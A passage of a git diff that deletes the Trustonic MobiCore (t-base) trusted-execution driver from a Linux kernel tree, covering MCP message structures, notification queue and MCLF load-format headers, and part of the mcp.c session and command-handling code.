--struct cmd_multimap {
--	struct cmd_header	cmd_header;	/** Command header */
--	uint32_t		session_id;	/** Session ID */
--	struct buffer_map	bufs[MC_MAP_MAX]; /** NWd buffer info */
--};
--
--/** Multimap Command Response */
--struct rsp_multimap {
--	struct rsp_header	rsp_header;	/** Response header */
--	/** Virtual address the WSM is mapped to, may include an offset! */
--	uint64_t		secure_va[MC_MAP_MAX];
--};
--
--/** @defgroup MCPMULTIUNMAP MULTIUNMAP
-- * Unmap up to MCP_MAP_MAX_BUF portions of world-shared memory from a session.
-- * The MULTIUNMAP command is used to unmap MCP_MAP_MAX_BUF previously mapped
-- * blocks of world shared memory from the context of a session.
-- *
-- * Attention: The memory blocks will be immediately unmapped from the specified
-- * session. If the service is still accessing the memory, the service will
-- * trigger a segmentation fault.
-- * @{ */
--
--/** NWd mapped buffer description
-- *
-- * Note: Information is coming from NWd kernel. So it should not be trusted more
-- * than NWd kernel is trusted.
-- */
--struct buffer_unmap {
--	uint64_t		secure_va;	/**< Secure virtual address */
--	uint32_t		len_buffer;	/**< Length of buffer */
--};
--
--/** Multiunmap Command */
--struct cmd_multiunmap {
--	struct cmd_header	cmd_header;	/** Command header */
--	uint32_t		session_id;	/** Session ID */
--	struct buffer_unmap	bufs[MC_MAP_MAX]; /** NWd buffer info */
--};
--
--/** Multiunmap Command Response */
--struct rsp_multiunmap {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** Structure of the MCP buffer */
--union mcp_message {
--	struct cmd_header	cmd_header;	/** Command header */
--	struct rsp_header	rsp_header;
--	struct cmd_open		cmd_open;	/** Load and open service */
--	struct rsp_open		rsp_open;
--	struct cmd_close	cmd_close;	/** Close command */
--	struct rsp_close	rsp_close;
--	struct cmd_map		cmd_map;	/** Map WSM to service */
--	struct rsp_map		rsp_map;
--	struct cmd_unmap	cmd_unmap;	/** Unmap WSM from service */
--	struct rsp_unmap	rsp_unmap;
--	struct cmd_suspend	cmd_suspend;	/** Suspend MobiCore */
--	struct rsp_suspend	rsp_suspend;
--	struct cmd_resume	cmd_resume;	/** Resume MobiCore */
--	struct rsp_resume	rsp_resume;
--	struct cmd_get_version	cmd_get_version; /** Get MobiCore Version */
--	struct rsp_get_version	rsp_get_version;
--	struct cmd_load_token	cmd_load_token;	/** Load token */
--	struct rsp_load_token	rsp_load_token;
--	struct cmd_check_load	cmd_check_load;	/** TA load check */
--	struct rsp_check_load	rsp_check_load;
--	struct cmd_multimap	cmd_multimap;	/** Map multiple WSMs */
--	struct rsp_multimap	rsp_multimap;
--	struct cmd_multiunmap	cmd_multiunmap;	/** Map multiple WSMs */
--	struct rsp_multiunmap	rsp_multiunmap;
--};
--
--/** Minimum MCP buffer length (in bytes) */
--#define MIN_MCP_LEN         sizeof(mcp_message_t)
--
--#define MC_FLAG_NO_SLEEP_REQ   0
--#define MC_FLAG_REQ_TO_SLEEP   1
--
--#define MC_STATE_NORMAL_EXECUTION 0
--#define MC_STATE_READY_TO_SLEEP   1
--
--struct sleep_mode {
--	uint16_t	sleep_req;	/** Ask SWd to get ready to sleep */
--	uint16_t	ready_to_sleep;	/** SWd is now ready to sleep */
--};
--
--/** MobiCore status flags */
--struct mcp_flags {
--	/** If not MC_FLAG_SCHEDULE_IDLE, MobiCore needsscheduling */
--	uint32_t	schedule;
--	struct sleep_mode sleep_mode;
--	/** Secure-world sleep timeout in milliseconds */
--	int32_t		timeout_ms;
--	/** Reserved for future use: Must not be interpreted */
--	uint32_t	RFU3;
--};
--
--/** MobiCore is idle. No scheduling required */
--#define MC_FLAG_SCHEDULE_IDLE      0
--/** MobiCore is non idle, scheduling is required */
--#define MC_FLAG_SCHEDULE_NON_IDLE  1
--
--/** MCP buffer structure */
--struct mcp_buffer {
--	struct mcp_flags	mc_flags;	/** MobiCore Flags */
--	union mcp_message	mcp_message;	/** MCP message buffer */
--};
--
--#endif /* MCP_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcinq.h b/drivers/gud/MobiCoreDriver/mci/mcinq.h
-deleted file mode 100644
-index 9f08b190d3222..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcinq.h
-+++ /dev/null
-@@ -1,86 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef NQ_H_
--#define NQ_H_
--
--/** \name NQ Size Defines
-- * Minimum and maximum count of elements in the notification queue.
-- */
--#define MIN_NQ_ELEM 1	/** Minimum notification queue elements */
--#define MAX_NQ_ELEM 64	/** Maximum notification queue elements */
--
--/** \name NQ Length Defines
-- * Minimum and maximum notification queue length.
-- */
--/** Minimum notification length (in bytes) */
--#define MIN_NQ_LEN (MIN_NQ_ELEM * sizeof(struct notification))
--/** Maximum notification length (in bytes) */
--#define MAX_NQ_LEN (MAX_NQ_ELEM * sizeof(struct notification))
--
--/** \name Session ID Defines
-- * Standard Session IDs.
-- */
--/** MCP session ID, used to communicate with MobiCore (e.g. to start/stop TA) */
--#define SID_MCP       0
--/** Invalid session id, returned in case of error */
--#define SID_INVALID   0xffffffff
--
--/** Notification data structure */
--struct notification {
--	uint32_t	session_id;	/** Session ID */
--	int32_t		payload;	/** Additional notification info */
--};
--
--/** Notification payload codes.
-- * 0 indicated a plain simple notification,
-- * a positive value is a termination reason from the task,
-- * a negative value is a termination reason from MobiCore.
-- * Possible negative values are given below.
-- */
--enum notification_payload {
--	/** task terminated, but exit code is invalid */
--	ERR_INVALID_EXIT_CODE = -1,
--	/** task terminated due to session end, no exit code available */
--	ERR_SESSION_CLOSE     = -2,
--	/** task terminated due to invalid operation */
--	ERR_INVALID_OPERATION = -3,
--	/** session ID is unknown */
--	ERR_INVALID_SID       = -4,
--	/** session is not active */
--	ERR_SID_NOT_ACTIVE    = -5,
--	/** session was force-killed (due to an administrative command). */
--	ERR_SESSION_KILLED    = -6,
--};
--
--/** Declaration of the notification queue header.
-- * layout as specified in the data structure specification.
-- */
--struct notification_queue_header {
--	uint32_t	write_cnt;	/** Write counter */
--	uint32_t	read_cnt;	/** Read counter */
--	uint32_t	queue_size;	/** Queue size */
--};
--
--/** Queue struct which defines a queue object.
-- * The queue struct is accessed by the queue<operation> type of
-- * function. elementCnt must be a power of two and the power needs
-- * to be smaller than power of uint32_t (obviously 32).
-- */
--struct notification_queue {
--	struct notification_queue_header hdr;		/** Queue header */
--	struct notification notification[MIN_NQ_ELEM];	/** Elements */
--};
--
--#endif /** NQ_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcloadformat.h b/drivers/gud/MobiCoreDriver/mci/mcloadformat.h
-deleted file mode 100644
-index f12f618bb0dc6..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcloadformat.h
-+++ /dev/null
-@@ -1,134 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef MCLOADFORMAT_H_
--#define MCLOADFORMAT_H_
--
--/** Trustlet Blob length info */
--#define MC_TLBLOBLEN_MAGIC	0x7672746C	/* Magic for SWd: vrtl */
--#define MAX_SO_CONT_SIZE	512		/* Max size for a container */
--
--/** MCLF flags */
--/**< Loaded service cannot be unloaded from MobiCore. */
--#define MC_SERVICE_HEADER_FLAGS_PERMANENT		BIT(0)
--/**< Service has no WSM control interface. */
--#define MC_SERVICE_HEADER_FLAGS_NO_CONTROL_INTERFACE	BIT(1)
--/**< Service can be debugged. */
--#define MC_SERVICE_HEADER_FLAGS_DEBUGGABLE		BIT(2)
--/**< New-layout trusted application or trusted driver. */
--#define MC_SERVICE_HEADER_FLAGS_EXTENDED_LAYOUT		BIT(3)
--
--/** Service type.
-- * The service type defines the type of executable.
-- */
--enum service_type {
--	SERVICE_TYPE_ILLEGAL		= 0,
--	SERVICE_TYPE_DRIVER		= 1,
--	SERVICE_TYPE_SP_TRUSTLET	= 2,
--	SERVICE_TYPE_SYSTEM_TRUSTLET	= 3,
--	SERVICE_TYPE_MIDDLEWARE		= 4,
--	SERVICE_TYPE_LAST_ENTRY		= 5,
--};
--
--/**
-- * Descriptor for a memory segment.
-- */
--struct segment_descriptor {
--	uint32_t	start;	/**< Virtual start address */
--	uint32_t	len;	/**< Segment length in bytes */
--};
--
--/**
-- * MCLF intro for data structure identification.
-- * Must be the first element of a valid MCLF file.
-- */
--struct mclf_intro {
--	uint32_t	magic;		/**< Header magic value ASCII "MCLF" */
--	uint32_t	version;	/**< Version the MCLF header struct */
--};
--
--/**
-- * @defgroup MCLF_VER_V2   MCLF Version 32
-- * @ingroup MCLF_VER
-- *
-- * @addtogroup MCLF_VER_V2
-- */
--
--/*
-- * GP TA identity.
-- */
--struct identity {
--	/**< GP TA login type */
--	uint32_t		login_type;
--	/**< GP TA login data */
--	uint8_t			login_data[16];
--};
--
--/**
-- * Version 2.1/2.2 MCLF header.
-- */
--struct mclf_header_v2 {
--	/**< MCLF header start with the mandatory intro */
--	struct mclf_intro	intro;
--	/**< Service flags */
--	uint32_t		flags;
--	/**< Type of memory the service must be executed from */
--	uint32_t		mem_type;
--	/**< Type of service */
--	enum service_type	service_type;
--	/**< Number of instances which can be run simultaneously */
--	uint32_t		num_instances;
--	/**< Loadable service unique identifier (UUID) */
--	struct mc_uuid_t	uuid;
--	/**< If the service_type is SERVICE_TYPE_DRIVER the Driver ID is used */
--	uint32_t		driver_id;
--	/**<
--	 * Number of threads (N) in a service:
--	 *   SERVICE_TYPE_SP_TRUSTLET: N = 1
--	 *   SERVICE_TYPE_SYSTEM_TRUSTLET: N = 1
--	 *   SERVICE_TYPE_DRIVER: N >= 1
--	 */
--	uint32_t		num_threads;
--	/**< Virtual text segment */
--	struct segment_descriptor text;
--	/**< Virtual data segment */
--	struct segment_descriptor data;
--	/**< Length of the BSS segment in bytes. MUST be at least 8 byte */
--	uint32_t		bss_len;
--	/**< Virtual start address of service code */
--	uint32_t		entry;
--	/**< Version of the interface the driver exports */
--	uint32_t		service_version;
--};
--
--/**
-- * @addtogroup MCLF
-- */
--
--/** MCLF header */
--union mclf_header {
--	/**< Intro for data identification */
--	struct mclf_intro	intro;
--	/**< Version 2 header */
--	struct mclf_header_v2	mclf_header_v2;
--};
--
--struct mc_blob_len_info {
--	uint32_t	magic;		/**< New blob format magic number */
--	uint32_t	root_size;	/**< Root container size */
--	uint32_t	sp_size;	/**< SP container size */
--	uint32_t	ta_size;	/**< TA container size */
--	uint32_t	reserved[4];	/**< Reserved for further Use */
--};
--
--#endif /* MCLOADFORMAT_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mcp.c b/drivers/gud/MobiCoreDriver/mcp.c
-deleted file mode 100644
-index 693fd42e2d4b5..0000000000000
---- a/drivers/gud/MobiCoreDriver/mcp.c
-+++ /dev/null
-@@ -1,1067 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/err.h>
--#include <linux/slab.h>
--#include <linux/mutex.h>
--#include <linux/device.h>
--#include <linux/sched.h>
--#include <linux/completion.h>
--#include <linux/circ_buf.h>
--#include <linux/delay.h>
--#include <linux/interrupt.h>
--#include <linux/debugfs.h>
--#include <linux/of_irq.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "mci/mcimcp.h"
--#include "mci/mcifc.h"
--#include "mci/mcinq.h"		/* SID_MCP */
--
--#include "platform.h"		/* IRQ number */
--#include "fastcall.h"
--#include "debug.h"
--#include "logging.h"
--#include "mcp.h"
--
--/* respond timeout for MCP notification, in secs */
--#define MCP_TIMEOUT		10
--#define MCP_RETRIES		5
--#define MCP_NF_QUEUE_SZ		8
--#define NQ_NUM_ELEMS		16
--
--static void mc_irq_worker(struct work_struct *data);
--DECLARE_WORK(irq_work, mc_irq_worker);
--
--static const struct {
--	unsigned int index;
--	const char *msg;
--} status_map[] = {
--	/**< MobiCore control flags */
--	{ MC_EXT_INFO_ID_FLAGS, "flags"},
--	/**< MobiCore halt condition code */
--	{ MC_EXT_INFO_ID_HALT_CODE, "haltCode"},
--	/**< MobiCore halt condition instruction pointer */
--	{ MC_EXT_INFO_ID_HALT_IP, "haltIp"},
--	/**< MobiCore fault counter */
--	{ MC_EXT_INFO_ID_FAULT_CNT, "faultRec.cnt"},
--	/**< MobiCore last fault cause */
--	{ MC_EXT_INFO_ID_FAULT_CAUSE, "faultRec.cause"},
--	/**< MobiCore last fault meta */
--	{ MC_EXT_INFO_ID_FAULT_META, "faultRec.meta"},
--	/**< MobiCore last fault threadid */
--	{ MC_EXT_INFO_ID_FAULT_THREAD, "faultRec.thread"},
--	/**< MobiCore last fault instruction pointer */
--	{ MC_EXT_INFO_ID_FAULT_IP, "faultRec.ip"},
--	/**< MobiCore last fault stack pointer */
--	{ MC_EXT_INFO_ID_FAULT_SP, "faultRec.sp"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_DFSR, "faultRec.arch.dfsr"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_ADFSR, "faultRec.arch.adfsr"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_DFAR, "faultRec.arch.dfar"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_IFSR, "faultRec.arch.ifsr"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_AIFSR, "faultRec.arch.aifsr"},
--	/**< MobiCore last fault ARM arch information */
--	{ MC_EXT_INFO_ID_FAULT_ARCH_IFAR, "faultRec.arch.ifar"},
--	/**< MobiCore configured by Daemon via fc_init flag */
--	{ MC_EXT_INFO_ID_MC_CONFIGURED, "mcData.flags"},
--	/**< MobiCore exception handler last partner */
--	{ MC_EXT_INFO_ID_MC_EXC_PARTNER, "mcExcep.partner"},
--	/**< MobiCore exception handler last peer */
--	{ MC_EXT_INFO_ID_MC_EXC_IPCPEER, "mcExcep.peer"},
--	/**< MobiCore exception handler last IPC message */
--	{ MC_EXT_INFO_ID_MC_EXC_IPCMSG, "mcExcep.cause"},
--	/**< MobiCore exception handler last IPC data */
--	{MC_EXT_INFO_ID_MC_EXC_IPCDATA, "mcExcep.meta"},
--};
--
--static struct mcp_context {
--	struct mutex buffer_lock;	/* Lock on SWd communication buffer */
--	struct mutex queue_lock;	/* Lock for MCP messages */
--	struct mcp_buffer *mcp_buffer;
--	struct tbase_session *session;
--	struct completion complete;
--	bool mcp_dead;
--	int irq;
--	int (*scheduler_cb)(enum mcp_scheduler_commands);
--	void (*crashhandler_cb)(void);
--	/* MobiCore MCI information */
--	unsigned int order;
--	union {
--		void		*base;
--		struct {
--			struct notification_queue *tx;
--			struct notification_queue *rx;
--		} nq;
--	};
--	/*
--	 * This notifications list is to be used to queue notifications when the
--	 * notification queue overflows, so no session gets its notification
--	 * lost, especially MCP.
--	 */
--	struct mutex		notifications_mutex;
--	struct list_head	notifications;
--	struct mcp_session	mcp_session;	/* Pseudo session for MCP */
--	/* Unexpected notification (during MCP open) */
--	struct mutex		unexp_notif_mutex;
--	struct notification	unexp_notif;
--	/* Sessions */
--	struct mutex		sessions_lock;
--	struct list_head	sessions;
--	/* Dump buffer */
--	struct kasnprintf_buf	dump;
--} mcp_ctx;
--
--static inline void mark_mcp_dead(void)
--{
--	mcp_ctx.mcp_dead = true;
--	complete(&mcp_ctx.complete);
--}
--
--static inline int mcp_set_sleep_mode_rq(uint16_t sleep_req)
--{
--	mutex_lock(&mcp_ctx.buffer_lock);
--	mcp_ctx.mcp_buffer->mc_flags.sleep_mode.sleep_req = sleep_req;
--	mutex_unlock(&mcp_ctx.buffer_lock);
--	return 0;
--}
--
--static ssize_t debug_crashdump_read(struct file *file, char __user *user_buf,
--				    size_t count, loff_t *ppos)
--{
--	if (mcp_ctx.dump.off)
--		return simple_read_from_buffer(user_buf, count, ppos,
--					       mcp_ctx.dump.buf,
--					       mcp_ctx.dump.off);
--
--	return 0;
--}
--
--static const struct file_operations mc_debug_crashdump_ops = {
--	.read = debug_crashdump_read,
--	.llseek = default_llseek,
--};
--
--static void mcp_dump_mobicore_status(void)
--{
--	char uuid_str[33];
--	int ret = 0;
--	int i;
--
--	if (mcp_ctx.dump.off)
--		ret = -EBUSY;
--
--	/* read additional info about exception-point and print */
--	dev_err(g_ctx.mcd, "<t-base halted. Status dump:");
--
--	for (i = 0; i < ARRAY_SIZE(status_map); i++) {
--		uint32_t info;
--
--		if (!mc_fc_info(status_map[i].index, NULL, &info)) {
--			dev_err(g_ctx.mcd, "  %-20s= 0x%08x\n",
--				status_map[i].msg, info);
--			if (ret >= 0)
--				ret = kasnprintf(&mcp_ctx.dump,
--						 "%-20s= 0x%08x\n",
--						 status_map[i].msg, info);
--		}
--	}
--
--	/* construct UUID string */
--	for (i = 0; i < 4; i++) {
--		uint32_t info;
--		int j;
--
--		if (mc_fc_info(MC_EXT_INFO_ID_MC_EXC_UUID + i, NULL, &info))
--			return;
--
--		for (j = 0; j < sizeof(info); j++) {
--			snprintf(&uuid_str[(i * sizeof(info) + j) * 2], 3,
--				 "%02x", (info >> (j * 8)) & 0xff);
--		}
--	}
--
--	dev_err(g_ctx.mcd, "  %-20s= 0x%s\n", "mcExcep.uuid", uuid_str);
--	if (ret >= 0)
--		ret = kasnprintf(&mcp_ctx.dump, "%-20s= 0x%s\n", "mcExcep.uuid",
--				 uuid_str);
--
--	if (ret < 0) {
--		kfree(mcp_ctx.dump.buf);
--		mcp_ctx.dump.off = 0;
--		return;
--	}
--
--	debugfs_create_file("crashdump", 0400, g_ctx.debug_dir, NULL,
--			    &mc_debug_crashdump_ops);
--	if (mcp_ctx.crashhandler_cb)
--		mcp_ctx.crashhandler_cb();
--}
--
--void mcp_session_init(struct mcp_session *session, bool is_gp,
--		      const struct identity *identity)
--{
--	/* close_work is initialized by the caller */
--	INIT_LIST_HEAD(&session->list);
--	INIT_LIST_HEAD(&session->notifications_list);
--	mutex_init(&session->notif_wait_lock);
--	init_completion(&session->completion);
--	mutex_init(&session->exit_code_lock);
--	session->state = MCP_SESSION_RUNNING;
--	session->is_gp = is_gp;
--	if (is_gp)
--		session->identity = *identity;
--}
--
--static inline bool mcp_session_isrunning(struct mcp_session *session)
--{
--	bool ret;
--
--	mutex_lock(&mcp_ctx.sessions_lock);
--	ret = session->state == MCP_SESSION_RUNNING;
--	mutex_unlock(&mcp_ctx.sessions_lock);
--	return ret;
--}
--
--/*
-- * session remains valid thanks to the upper layers reference counters, but the
-- * SWd session may have died, in which case we are informed.
-- */
--int mcp_session_waitnotif(struct mcp_session *session, int32_t timeout)
--{
--	int ret = 0;
--
--	mutex_lock(&session->notif_wait_lock);
--	if (!mcp_session_isrunning(session)) {
--		ret = -ENXIO;
--		goto end;
--	}
--
--	if (mcp_session_exitcode(session)) {
--		ret = -ECOMM;
--		goto end;
--	}
--
--	if (timeout < 0) {
--		ret = wait_for_completion_interruptible(&session->completion);
--		if (ret)
--			goto end;
--	} else {
--		ret = wait_for_completion_interruptible_timeout(
--			&session->completion, timeout * HZ / 1000);
--		if (ret < 0)
--			/* Interrupted */
--			goto end;
--
--		if (!ret) {
--			/* Timed out */
--			ret = -ETIME;
--			goto end;
--		}
--
--		ret = 0;
--	}
--
--	if (mcp_session_exitcode(session)) {
--		ret = -ECOMM;
--		goto end;
--	}
--
--	if (!mcp_session_isrunning(session)) {
--		ret = -ENXIO;
--		goto end;
--	}
--
--end:
--	mutex_unlock(&session->notif_wait_lock);
--	if (ret)
--		dev_info(g_ctx.mcd, "%s session %x ec %d ret %d\n", __func__,
--			 session->id, session->exit_code, ret);
--
--	return ret;
--}
--
--int32_t mcp_session_exitcode(struct mcp_session *session)
--{
--	int32_t exit_code;
--
--	mutex_lock(&session->exit_code_lock);
--	exit_code = session->exit_code;
--	mutex_unlock(&session->exit_code_lock);
--	if (exit_code)
--		dev_info(g_ctx.mcd, "%s session %x ec %d\n", __func__,
--			 session->id, exit_code);
--
--	return exit_code;
--}
--
--int mcp_suspend(void)
--{
--	return mcp_set_sleep_mode_rq(MC_FLAG_REQ_TO_SLEEP);
--}
--
--int mcp_resume(void)
--{
--	return mcp_set_sleep_mode_rq(MC_FLAG_NO_SLEEP_REQ);
--}
--
--bool mcp_suspended(void)
--{
--	struct mcp_flags *flags = &mcp_ctx.mcp_buffer->mc_flags;
--	bool ret;
--
--	mutex_lock(&mcp_ctx.buffer_lock);
--	ret = flags->sleep_mode.ready_to_sleep & MC_STATE_READY_TO_SLEEP;
--	if (!ret) {
--		MCDRV_DBG("IDLE=%d!", flags->schedule);
--		MCDRV_DBG("Request Sleep=%d!", flags->sleep_mode.sleep_req);
--		MCDRV_DBG("Sleep Ready=%d!", flags->sleep_mode.ready_to_sleep);
--	}
--
--	mutex_unlock(&mcp_ctx.buffer_lock);
--	return ret;
--}
--
--bool mcp_get_idle_timeout(int32_t *timeout)
--{
--	uint32_t schedule;
--	bool ret;
--
--	mutex_lock(&mcp_ctx.buffer_lock);
--	schedule = mcp_ctx.mcp_buffer->mc_flags.schedule;
--	if (schedule == MC_FLAG_SCHEDULE_IDLE) {
--		if (g_ctx.f_timeout)
--			*timeout = mcp_ctx.mcp_buffer->mc_flags.timeout_ms;
--		else
--			*timeout = -1;
--
--		ret = true;
--	} else {
--		ret = false;
--	}
--
--	mutex_unlock(&mcp_ctx.buffer_lock);
--	return ret;
--}
--
--void mcp_reset_idle_timeout(void)
--{
--	mutex_lock(&mcp_ctx.buffer_lock);
--	mcp_ctx.mcp_buffer->mc_flags.timeout_ms = -1;
--	mutex_unlock(&mcp_ctx.buffer_lock);
--}
--
--static inline int wait_mcp_notification(void)
--{
--	unsigned long timeout = msecs_to_jiffies(MCP_TIMEOUT * 1000);
--	int try;
--
--	/*
--	 * Total timeout is MCP_TIMEOUT * MCP_RETRIES, but we check for a crash
--	 * to try and terminate before then if things go wrong.
--	 */
--	for (try = 1; try <= MCP_RETRIES; try++) {
--		uint32_t status;
--		int ret;
--
--		/*
--		* Wait non-interruptible to keep MCP synchronised even if caller
--		* is interrupted by signal.
--		*/
--		ret = wait_for_completion_timeout(&mcp_ctx.complete, timeout);
--		if (ret > 0)
--			return 0;
--
--		MCDRV_ERROR("No answer after %ds", MCP_TIMEOUT * try);
--
--		/* If SWd halted, exit now */
--		if (!mc_fc_info(MC_EXT_INFO_ID_MCI_VERSION, &status, NULL) &&
--		    (status == MC_STATUS_HALT))
--					break;
--	}
--
--	/* <t-base halted or dead: dump status */
--	mark_mcp_dead();
--	mcp_dump_mobicore_status();
--
--	return -ETIME;
--}
--
--static int mcp_cmd(union mcp_message *cmd)
--{
--	int err = 0;
--	union mcp_message *msg = &mcp_ctx.mcp_buffer->mcp_message;
--	enum cmd_id cmd_id = cmd->cmd_header.cmd_id;
--
--	mutex_lock(&mcp_ctx.queue_lock);
--	if (mcp_ctx.mcp_dead)
--		goto out;
--
--	/* Copy message to MCP buffer */
--	memcpy(msg, cmd, sizeof(*msg));
--
--	/* Poke tbase */
--	err = mcp_notify(&mcp_ctx.mcp_session);
--	if (!err)
--		err = wait_mcp_notification();
--
--	if (err)
--		goto out;
--
--	/* Check response ID */
--	if (msg->rsp_header.rsp_id != (cmd_id | FLAG_RESPONSE)) {
--		MCDRV_ERROR("MCP command got invalid response (0x%X)",
--			    msg->rsp_header.rsp_id);
--		err = -EBADE;
--		goto out;
--	}
--
--	/* Convert result */
--	switch (msg->rsp_header.result) {
--	case MC_MCP_RET_OK:
--		err = 0;
--		break;
--	case MC_MCP_RET_ERR_CLOSE_TASK_FAILED:
--	case MC_MCP_RET_ERR_NO_MORE_SESSIONS:
--		err = -EBUSY;
--		break;
--	case MC_MCP_RET_ERR_OUT_OF_RESOURCES:
--		err = -ENOSPC;
--		break;
--	case MC_MCP_RET_ERR_UNKNOWN_UUID:
--		err = -ENOENT;
--		break;
--	case MC_MCP_RET_ERR_WRONG_PUBLIC_KEY:
--		err = -EKEYREJECTED;
--		break;
--	case MC_MCP_RET_ERR_SERVICE_BLOCKED:
--		err = -ECONNREFUSED;
--		break;
--	case MC_MCP_RET_ERR_SERVICE_LOCKED:
--		err = -ECONNABORTED;
--		break;
--	case MC_MCP_RET_ERR_SERVICE_KILLED:
--		err = -ECONNRESET;
--		break;
--	default:
--		MCDRV_ERROR("cmd %d returned %d.", cmd_id,
--			    msg->rsp_header.result);
--		err = -EPERM;
--		goto out;
--	}
--
--	/* Copy response back to caller struct */
--	memcpy(cmd, msg, sizeof(*cmd));
--
--out:
--	mutex_unlock(&mcp_ctx.queue_lock);
--	return err;
--}
--
--int mcp_get_version(struct mc_version_info *version_info)
--{
--	union mcp_message cmd;
--	int ret;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_GET_MOBICORE_VERSION;
--	ret = mcp_cmd(&cmd);
--	if (!ret)
--		memcpy(version_info, &cmd.rsp_get_version.version_info,
--		       sizeof(*version_info));
--
--	return ret;
--}
--
--int mcp_load_token(uintptr_t data, const struct mcp_buffer_map *map)
--{
--	union mcp_message cmd;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_LOAD_TOKEN;
--	cmd.cmd_load_token.wsm_data_type = map->type;
--	cmd.cmd_load_token.adr_load_data = map->phys_addr;
--	cmd.cmd_load_token.ofs_load_data = map->offset;
--	cmd.cmd_load_token.len_load_data = map->length;
--	return mcp_cmd(&cmd);
--}
--
--int mcp_load_check(const struct tbase_object *obj,
--		   const struct mcp_buffer_map *map)
--{
--	const union mclf_header *header;
--	union mcp_message cmd;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_CHECK_LOAD_TA;
--	/* Data */
--	cmd.cmd_check_load.wsm_data_type = map->type;
--	cmd.cmd_check_load.adr_load_data = map->phys_addr;
--	cmd.cmd_check_load.ofs_load_data = map->offset;
--	cmd.cmd_check_load.len_load_data = map->length;
--	/* Header */
--	header = (union mclf_header *)(obj->data + obj->header_length);
--	cmd.cmd_check_load.uuid = header->mclf_header_v2.uuid;
--	return mcp_cmd(&cmd);
--}
--
--int mcp_open_session(struct mcp_session *session,
--		     const struct tbase_object *obj,
--		     const struct mcp_buffer_map *map,
--		     const struct mcp_buffer_map *tci_map)
--{
--	static DEFINE_MUTEX(local_mutex);
--	const union mclf_header *header;
--	union mcp_message cmd;
--	int ret;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_OPEN_SESSION;
--	/* Data */
--	cmd.cmd_open.wsm_data_type = map->type;
--	cmd.cmd_open.adr_load_data = map->phys_addr;
--	cmd.cmd_open.ofs_load_data = map->offset;
--	cmd.cmd_open.len_load_data = map->length;
--	/* Buffer */
--	if (tci_map) {
--		cmd.cmd_open.wsmtype_tci = tci_map->type;
--		cmd.cmd_open.adr_tci_buffer = tci_map->phys_addr;
--		cmd.cmd_open.ofs_tci_buffer = tci_map->offset;
--		cmd.cmd_open.len_tci_buffer = tci_map->length;
--	} else {
--		cmd.cmd_open.wsmtype_tci = WSM_INVALID;
--	}
--	/* Header */
--	header = (union mclf_header *)(obj->data + obj->header_length);
--	cmd.cmd_open.uuid = header->mclf_header_v2.uuid;
--	cmd.cmd_open.is_gpta = session->is_gp;
--	/* Reset unexpected notification */
--	mutex_lock(&local_mutex);
--	mcp_ctx.unexp_notif.session_id = SID_MCP;	/* Cannot be */
--	if (!g_ctx.f_client_login) {
--		memcpy(&cmd.cmd_open.tl_header, header,
--		       sizeof(cmd.cmd_open.tl_header));
--	} else {
--		cmd.cmd_open.cmd_open_data.mclf_magic = MC_GP_CLIENT_AUTH_MAGIC;
--		if (session->is_gp)
--			cmd.cmd_open.cmd_open_data.identity = session->identity;
--	}
--
--	/* Send MCP open command */
--	ret = mcp_cmd(&cmd);
--	if (!ret) {
--		session->id = cmd.rsp_open.session_id;
--		/* Add to list of sessions */
--		mutex_lock(&mcp_ctx.sessions_lock);
--		list_add(&session->list, &mcp_ctx.sessions);
--		mutex_unlock(&mcp_ctx.sessions_lock);
--		/* Check for spurious notification */
--		mutex_lock(&mcp_ctx.unexp_notif_mutex);
--		if (mcp_ctx.unexp_notif.session_id == session->id) {
--			mutex_lock(&session->exit_code_lock);
--			session->exit_code = mcp_ctx.unexp_notif.payload;
--			mutex_unlock(&session->exit_code_lock);
--			complete(&session->completion);
--		}
--
--		mutex_unlock(&mcp_ctx.unexp_notif_mutex);
--	}
--
--	mutex_unlock(&local_mutex);
--	return ret;
--}
--
--/*
